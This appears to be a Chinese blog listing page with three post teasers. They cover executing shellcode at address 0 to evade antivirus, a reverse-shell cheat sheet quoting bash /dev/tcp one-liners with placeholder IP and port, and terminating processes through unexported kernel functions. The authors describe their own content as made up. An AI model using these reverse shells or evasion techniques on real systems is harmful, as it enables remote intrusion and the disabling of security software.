摘要：本文所有内容均为胡编乱造，如有不正确的地方，随时私信。 实现原理： 0地址通常不可访问，根据这一特性，部分杀软不会检查此处内存，从而绕过部分杀软。 方案一：利用异常处理执行shellcode 0地址的属性 通常情况下0地址不可访问，大小为10000 C0000005访问冲突错误 异常处理 异常处理函 阅读全文

摘要：未测试。请勿用于非法用途 Bash TCP bash -i >& /dev/tcp/IP/port 0>&1 /bin/bash -i > /dev/tcp/IP/port 0<& 2>&1 exec 5<>/dev/tcp/IP/port;cat <&5 | while read line; do 阅读全文

摘要：利用未导出函数结束进程 本文所有内容均为胡编乱造，如有不正确的地方，随时私信。 知识理论 内核模块 内核模块是什么？ 内核模块如何布局的？ 暴力搜索 如何通过特征码暴力搜索未导出函数？ 内核模块 内核模块是什么？ 驱动程序每一个都是一个模块，称为“内核模块”。 都可以加载到内核中 都遵守PE格式。 阅读全文